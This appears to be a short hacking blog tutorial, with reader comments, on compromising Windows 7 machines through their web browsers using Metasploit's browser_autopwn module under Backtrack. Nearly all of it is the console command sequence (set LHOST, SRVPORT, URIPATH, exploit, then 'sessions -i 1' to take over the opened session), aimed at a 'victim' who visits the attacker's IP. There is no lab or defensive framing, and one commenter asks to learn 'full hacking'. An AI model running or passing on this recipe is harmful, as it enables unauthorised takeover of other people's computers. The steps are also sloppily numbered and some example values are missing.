Tutorial On Windows 7 with Metasploit

Hack Windows 7 In 2 minutes

What You Need To Do ANd What you Want to do?

2.Windows 7 machine
3.Installed Browser eg  chrome, IE, Firefox or any

So Let's Start
1.Start Backtrack
2.Type "Startx" To enter GUI mode of Backtrack.
3.Go To terminal
4.Type "msfconsole"
5. Type msf:>use auxiliary/server/browser_autopwn

 msf :>show Options
Set LHOST means Localhost ip address To check Localhost ip Go to terminal And type "ifconfig"
7. msf:>set LHOST eg.
After That you want set SRVPORT which is 80 or 8080
8.msf:>set SRVPORT 80
Then set URIPATH eg.root "/"
9.msf:>set URIPATH /
Now Everything Is done
10.msf:>exploit or run
Now What to need To to open On victim Machine
Open Any Browser Type Your BAcktrack Machine's ip address
After A minute you Can see our Session Is open

msf:>sessions -i 1
If You have any problem Reply Here


  1. At the last step when I use "sessions -i 1" it shows "Invalid session id". I have done all the steps carefully and they all are successful but the last one is showing the above error...What I have to do?

  2. Woking Fine thanks NAVDEEP SETHI

  3. very good sight i want to learn full hacking plese help me......
